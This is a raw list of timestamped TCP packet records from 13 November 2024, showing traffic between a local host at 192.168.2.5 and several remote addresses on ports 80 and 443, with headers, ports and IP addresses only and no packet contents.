Nov 13, 2024 20:39:24.996818066 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.996828079 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.996855021 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.996857882 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.996908903 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.997211933 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.997271061 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.997344017 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.997392893 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.035907030 CET	443	49729	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:25.035983086 CET	49729	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:25.036870956 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.036943913 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.036973000 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.037017107 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.037049055 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.037091970 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.037915945 CET	49729	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:25.037928104 CET	443	49729	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:25.038255930 CET	443	49729	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:25.039815903 CET	49729	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:25.039913893 CET	49729	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:25.039918900 CET	443	49729	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:25.040113926 CET	49729	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:25.040167093 CET	443	49731	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:25.040576935 CET	49731	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:25.040596962 CET	443	49731	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:25.041006088 CET	49731	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:25.041011095 CET	443	49731	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:25.047074080 CET	443	49730	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:25.047524929 CET	49730	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:25.047553062 CET	443	49730	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:25.047888994 CET	49730	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:25.047897100 CET	443	49730	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:25.078661919 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.078701973 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.078736067 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.078819036 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.078819990 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.078819990 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.081783056 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.081818104 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.081844091 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.081852913 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.081857920 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.081896067 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.081949949 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.081985950 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.081995964 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.082027912 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.082036018 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.082067966 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.082123995 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.082175016 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.082328081 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.082357883 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.082380056 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.082392931 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.082566977 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.082602024 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.082621098 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.082636118 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.082643986 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.082675934 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.082730055 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.082766056 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.082781076 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.082802057 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.082813025 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.082847118 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.082910061 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.082945108 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.082952976 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.082987070 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.083367109 CET	443	49729	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:25.101520061 CET	443	49732	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:25.101934910 CET	49732	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:25.101968050 CET	443	49732	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:25.102345943 CET	49732	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:25.102351904 CET	443	49732	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:25.107279062 CET	443	49733	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:25.107547045 CET	49733	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:25.107567072 CET	443	49733	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:25.107860088 CET	49733	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:25.107863903 CET	443	49733	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:25.112272024 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.112327099 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.112337112 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.112360954 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.112370968 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.112396955 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.112405062 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.112442970 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.112472057 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.112519026 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.112668037 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.112714052 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.112720966 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.112751961 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.112766981 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.112801075 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.112803936 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.112838030 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.112845898 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.112883091 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.113040924 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.113075018 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.113092899 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.113109112 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.113116980 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.113153934 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.113342047 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.113375902 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.113390923 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.113409996 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.113421917 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.113455057 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.113631010 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.113663912 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.113678932 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.113699913 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.113707066 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.113748074 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.153748989 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.153805971 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.153853893 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.153902054 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.153944969 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.153944969 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.167757988 CET	443	49731	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:25.167831898 CET	443	49731	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:25.168067932 CET	49731	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:25.168068886 CET	49731	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:25.168117046 CET	49731	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:25.168138027 CET	443	49731	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:25.171092987 CET	49735	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:25.171189070 CET	443	49735	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:25.171293020 CET	49735	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:25.171461105 CET	49735	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:25.171479940 CET	443	49735	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:25.178237915 CET	443	49730	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:25.178401947 CET	443	49730	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:25.178472996 CET	49730	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:25.178513050 CET	49730	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:25.178514004 CET	49730	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:25.178538084 CET	443	49730	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:25.178550959 CET	443	49730	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:25.180388927 CET	49736	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:25.180429935 CET	443	49736	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:25.180490971 CET	49736	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:25.180602074 CET	49736	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:25.180619001 CET	443	49736	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:25.195494890 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.195558071 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.195566893 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.195591927 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.195600033 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.195628881 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.195636034 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.195664883 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.195673943 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.195709944 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.198371887 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.198401928 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.198429108 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.198448896 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.198455095 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.198484898 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.198498964 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.198529959 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.198554039 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.198586941 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.198604107 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.198626041 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.198679924 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.198712111 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.198728085 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.198748112 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.198753119 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.198792934 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.198942900 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.198971987 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.198993921 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.199011087 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.199079037 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.199112892 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.199129105 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.199146986 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.199152946 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.199194908 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.199301004 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.199348927 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.199368954 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.199417114 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.199420929 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.199455976 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.199465036 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.199491024 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.199502945 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.199532986 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.229156017 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.229259968 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.229351997 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.229352951 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.229513884 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.229568005 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.229583979 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.229629993 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.229633093 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.229667902 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.229677916 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.229712963 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.229717970 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.229756117 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.229763031 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.229789972 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.229801893 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.229825020 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.229832888 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.229868889 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.230190039 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.230240107 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.230241060 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.230276108 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.230287075 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.230321884 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.230436087 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.230484962 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.230506897 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.230540991 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.230545044 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.230576038 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.230588913 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.230614901 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.233481884 CET	443	49732	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:25.234113932 CET	443	49732	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:25.234164000 CET	49732	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:25.234200954 CET	49732	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:25.234220028 CET	443	49732	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:25.234232903 CET	49732	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:25.234237909 CET	443	49732	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:25.236452103 CET	49737	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:25.236546040 CET	443	49737	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:25.236634970 CET	49737	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:25.236777067 CET	49737	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:25.236812115 CET	443	49737	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:25.238420010 CET	443	49733	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:25.238497019 CET	443	49733	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:25.238543034 CET	49733	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:25.238598108 CET	49733	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:25.238607883 CET	443	49733	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:25.238616943 CET	49733	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:25.238621950 CET	443	49733	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:25.240344048 CET	49738	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:25.240375996 CET	443	49738	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:25.240427971 CET	49738	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:25.240552902 CET	49738	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:25.240566015 CET	443	49738	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:25.270575047 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.270615101 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.270648956 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.270981073 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.270981073 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.290088892 CET	443	49729	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:25.290664911 CET	49729	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:25.290698051 CET	443	49729	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:25.290723085 CET	49729	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:25.290761948 CET	49729	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:25.312285900 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.312339067 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.312374115 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.312407017 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.312443018 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.312505960 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.312505960 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.312506914 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.312506914 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.315331936 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.315371990 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.315393925 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.315407038 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.315419912 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.315443039 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.315450907 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.315479040 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.315493107 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.315512896 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.315530062 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.315560102 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.315583944 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.315618992 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.315630913 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.315670013 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.315995932 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.316046953 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.316051960 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.316093922 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.316111088 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.316159964 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.316175938 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.316226006 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.316226959 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.316261053 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.316274881 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.316303968 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.316534996 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.316584110 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.316586971 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.316621065 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.316634893 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.316657066 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.316672087 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.316689968 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.316698074 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.316737890 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.346484900 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.346520901 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.346554995 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.346607924 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.346657038 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.346684933 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.346684933 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.346684933 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.346690893 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.346725941 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.346739054 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.346739054 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.346761942 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.346764088 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.346797943 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.346801996 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.346843004 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.347172022 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.347204924 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.347223043 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.347244024 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.347258091 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.347304106 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:25.347310066 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:25.347362995 CET	80	49720	185.215.113.206	192.168.2.5
